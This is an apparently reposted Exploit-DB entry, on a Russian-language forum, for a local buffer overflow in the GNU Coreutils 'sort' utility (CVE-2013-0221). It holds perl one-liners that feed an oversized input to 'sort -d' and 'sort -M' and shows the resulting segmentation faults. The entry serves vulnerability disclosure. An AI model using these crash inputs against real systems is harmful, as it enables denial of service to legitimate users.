- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38232
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2013-0221
- Дата публикации
- 2013-01-21
GNU Coreutils 'sort' Text Utility - Local Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/57492/info
GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.
A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed.
% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13432 segmentation fault sort -d
% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13434 segmentation fault sort -M
- Источник
- www.exploit-db.com